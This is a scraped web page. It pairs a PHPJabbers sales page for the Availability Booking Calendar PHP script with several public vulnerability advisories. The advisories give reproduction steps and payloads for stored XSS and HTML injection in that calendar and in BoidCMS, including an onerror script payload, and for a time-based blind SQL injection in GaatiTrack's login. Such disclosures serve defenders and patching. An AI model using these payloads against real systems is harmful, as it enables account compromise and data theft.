*   Highlights
*   Features
*   Demo
*   Faq
*   Knowledge Base
*   Pricing

**Product Highlights**

Add a smart reservation calendar to your website and show your clients your service schedule online so that they can easily book and pay in advance. The Availability Booking Calendar script will facilitate and improve both your customer relations as well as administration.

Multi-Calendar Support

Create as many availability booking calendars as you need. Each reservation calendar can be configured separately.

Multiple Languages

A language editor allows you to translate the PHP booking calendar script and add multiple languages on the front end.

Customizable Appearance

Manage booking calendars through the Admin Panel and make them perfectly fit your website style and content.

High Speed & Performance

The calendar booking system works flawlessly with heavy databases and loads quickly without reloading the entire web page.

Reservation Management

The Availability Booking Calendar enables script admins to easily review and manage both reservations and client details.

Email & SMS Notifications

The calendar booking system can be configured to send out email & SMS notifications to users upon new bookings and payments.

Payment Integration

The built-in payment module accepts online payments via PayPal and Authorize.net and also lets you process offline payments.

PHP Source Code Customization

You can either buy the Developer License and make your own changes, or get the User License and request the custom modifications from us.

SPECIAL OFFER

**Availability Booking Calendar for €4.59 Only**

Get all 65 PHPJabbers scripts in a bundle for just €279.

**Live Demo**

Preview both the front end and back end of the Availability Booking Calendar script and test out the whole functionality.  
If you have any questions or need technical advice, go ahead and contact us.

**Availability Booking Calendar**

**Key Benefits**

Key Features

Script Modifications

Customizations

Remote Hosting

Extended Licence

**Pricing**

You can buy the Availability Booking Calendar both with a Developer and a User License – compare them below.  
Do you need a custom modification? We'll happily do it for you! Just contact us, describe what you need, and we'll send you a quote!

Mega Sale deal

€4.59

per script

Free installation support

Modify the code

Copyright removal

Apply for Extended Licence and advertise our product on your website

Unlimited installations

Free updates

Get all minor updates for free

Custom modifications

Contact us and you'll receive quotation for the custom changes you may need

buy now

Free installation support

Modify the code

Copyright removal

Apply for Extended Licence and advertise our product on your website

Unlimited installations

Free updates

Get all minor updates for free

Custom modifications

Modify the software on your own or contact us and we will give you a quote

buy now

Mega Sale deal

€4.59 per script

Get 65 PHP Scripts

Modify the code

Copyright removal

Apply for Extended Licence and advertise our product on your website

Unlimited installations

Free updates

Get all minor updates for free

Custom modifications

Modify the software on your own or contact us and we will give you a quote

buy now

LIMITED OFFER

Get the Mega Sale bundle deal with all the PHP scripts you'll ever need for a total of

€279

VIEW DETAILS

**Testimonials**

Let our clients share their experience with our PHP Availability Booking Calendar script and how it has improved their online business.

“

I highly recommend the Availability Booking Calendar script. It is easy to install and administrate, yet it offers powerful features. This calendar booking system is also simple to use by customers. The PHPJabbers support is very quick and prices are very reasonable.

Axel Schmidt

“

I was looking for a PHP booking script and came across phpjabbers.com, but I wanted quite a few mods done. These guy sorted them out quickly and efficiently. The after sales support is fantastic as well. Thanks, team!

Mark Thompson

“

After looking at the availability booking calendar script and studied it I bought it. While Swedish is not the most used language it started out with problems to use the special characters. It took less than one hour for PHPJabbers support team to solve this for me. Now the booking form works perfectly - well invested money!

Anders Sjoberg

**FAQ & Knowledge Base**

Pre-Sale FAQ

Read the most Frequently Asked Questions about this script, its features and use.

Support Service FAQ

Read more about our Support Service and how we can help you install Availability Booking Calendar.

Custom Mods FAQ

Do you need something changed? We offer customization services.

How to install a Script

See how easy it is to install the script. Just follow the instructions or leave it all to us.

PHP Framework Used

We use our own in-house build framework which is really easy to understand and work with.

Our Services

We offer a wide range of web development       services.

License Types Explained

User and Developer licence available. We also have a special Extended Licence for webmasters.

Didn’t find exactly what you were looking for?

Contact Us

**Related Scripts**

**Event Booking Calendar**

**Time Slots Booking Calendar**

**Rental Property Booking Calendar**

**Availability Calendar**

**Appointment Scheduler**

**Hotel Booking System**

CVE-2023-48831: Availability Booking Calendar | Calendar Booking System

Availability Booking Calendar 5.0 is vulnerable to Multiple HTML Injection issues via SMS API Key or Default Country Code.

    # Exploit Title: PHPJabbers Availability Booking Calendar v5.0 - HTML Injection# Date: 13/11/2023# Exploit Author: BugsBD Limited# Discover by: Rahad Chowdhury# Vendor Homepage: https://www.phpjabbers.com/# Software Link:https://www.phpjabbers.com/availability-booking-calendar/#sectionDemo# Version: v5.0# Tested on: Windows 10, Windows 11, Linux# CVE-2023-48825Descriptions:HTML injection, also known as HTML code injection or cross-sitescripting (XSS), is a web security vulnerability that allows anattacker to inject malicious code into a web page that is then viewedby other users. This can lead to various attacks, such as stealingsensitive information, session hijacking, defacement of websites, ordelivering malware to users.Steps to Reproduce:1. Login your panel2. Go to System Menu then click SMS Settings.3. Then use any HTML Tag in "SMS API Key", "Default Country Code"input field and Save.4. You will see HTML code working here.## Reproduce:[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48825)

CVE-2023-48825: PHPJabbers Availability Booking Calendar 5.0 HTML Injection ≈ Packet Storm

BoidCMS 2.0.1 is vulnerable to Multiple Stored Cross-Site Scripting (XSS) issues via the title, subtitle, footer, or keywords parameter in a page=create action.

    # Exploit Title: BoidCMS v2.0.1 - Multiple Stored XSS# Date: 13/11/2023# Exploit Author: BugsBD Limited# Discover by: Rahad Chowdhury# Vendor Homepage: https://boidcms.github.io/#/# Software Link: https://github.com/BoidCMS/BoidCMS/archive/refs/tags/v2.0.1.zip# Version: v2.0.1# Tested on: Windows 10, PHP 8.2.4, Apache 2.4.56# CVE: CVE-2023-48824Descriptions:BoidCMS v2.0.1 is vulnerable to Multiple Stored Cross-Site Scripting(XSS) Authenticated vulnerabilities in the "title, subtitle, footer,keywords" parameters of&nbsp;settings, create page.Steps to Reproduce:1. Request:POST /BoidCMS/admin?page=create HTTP/1.1Host: 192.168.1.74User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/119.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: multipart/form-data;boundary=---------------------------9882691211259772119227456445Content-Length: 1492Origin: http://192.168.1.74Connection: closeReferer: http://192.168.1.74/BoidCMS/admin?page=createCookie: PHPSESSID=51i07vv0i4bqf0s9sl14tshq20;KOD_SESSION_SSO=8lu85nmqbd7o912f2lldm1g08k;KOD_SESSION_ID_53f4f=p7am25v0dladkuqetsqer4mdhcUpgrade-Insecure-Requests: 1-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="type"post-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="title"test-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="descr"test-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="keywords"test-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="content"test-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="permalink"-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="tpl"theme.php-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="thumb"-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="date"2023-12-02T19:41-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="pub"true-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="token"83f330c1fea7a77a033324b848b5cd623d17d5cf25de1975ff2cce32badbe9cd-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="create"Create-----------------------------9882691211259772119227456445--2. Now use xss payload "><img src=x onerror=alert(1)> on "title,subtitle, footer, keywords" parameters.3. Save and check home.## Reproduce:[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48824)

CVE-2023-48824: BoidCMS 2.0.1 Cross Site Scripting ≈ Packet Storm

A Blind SQL injection issue in ajax.php in GaatiTrack Courier Management System 1.0 allows an unauthenticated attacker to inject a payload via the email parameter during login.

    # Exploit Title: GaatiTrack Courier Management System v1.0 - SQL Injection# Date: 13/11/2023# Exploit Author: BugsBD Limited# Discover by: Rahad Chowdhury# Vendor Homepage: https://www.mayurik.com/# Software Link:https://www.mayurik.com/source-code/P0998/best-courier-management-system-project-in-php# Version: v1.0# Tested on: Windows 10, PHP 8.2.4, Apache 2.4.56# CVE: CVE-2023-48823Descriptions:Blind SQL injection in ajax.php in GaatiTrack Courier ManagementSystem v1.0 allows an unauthenticated attacker to insert malicious SQLqueries via email parameter.Steps to Reproduce:1. Request:POST /gaatitrack/ajax.php?action=login HTTP/1.1Host: 192.168.1.74User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/119.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 83Origin: http://192.168.1.74Connection: closeReferer: http://192.168.1.74/gaatitrack/login.phpCookie: PHPSESSID=abl1dci7hob2f90sf5ag9k00mp;KOD_SESSION_SSO=8lu85nmqbd7o912f2lldm1g08k;KOD_SESSION_ID_53f4f=p7am25v0dladkuqetsqer4mdhcemail=test%40test.com&password=1234562. Now use blind sqli query after email parameter. So your request data will be:POST /gaatitrack/ajax.php?action=login HTTP/1.1Host: 192.168.1.74User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/119.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 83Origin: http://192.168.1.74Connection: closeReferer: http://192.168.1.74/gaatitrack/login.phpCookie: PHPSESSID=abl1dci7hob2f90sf5ag9k00mp;KOD_SESSION_SSO=8lu85nmqbd7o912f2lldm1g08k;KOD_SESSION_ID_53f4f=p7am25v0dladkuqetsqer4mdhcemail=test%40test.com'XOR(if(now()=sysdate()%2Csleep(4)%2C0))XOR'&password=123456## Reproduce:[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48823)

CVE-2023-48823: GaatiTrack Courier Management System 1.0 SQL Injection ≈ Packet Storm

A Cross Site Scripting vulnerability in Availability Booking Calendar 5.0 allows an attacker to inject JavaScript via the name, plugin_sms_api_key, plugin_sms_country_code, uuid, title, or country name parameter to index.php.

    # Exploit Title: Multiple Cross Site Scripting in PHPJabbers AvailabilityBooking Calendar v5.0# Date: 12/11/2023# Exploit Author: BugsBD Security Researcher (Orpon)# Vendor Homepage: https://www.phpjabbers.com/# Software Link:https://www.phpjabbers.com/availability-booking-calendar/#sectionDemo# Version: v5.0# Tested on: Windows 10, Linux# CVE: CVE-2023-48208Description:PHPJabbers Availability Booking Calendar v5.0 is vulnerable to MultipleStored Cross-Site Scripting (XSS) vulnerabilities in the "name,plugin_sms_api_key, plugin_sms_country_code, uuid, title, country name"parameters of index.php page.Steps to Reproduce:1. Login your panel2. Go to System Menu then click SMS Settings.3. Then use any XSS Payload in "SMS API Key", "Default Country Code" inputfield and Save.4. You will see XSS pop up.## Reproduce:[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48208)

Tag

#php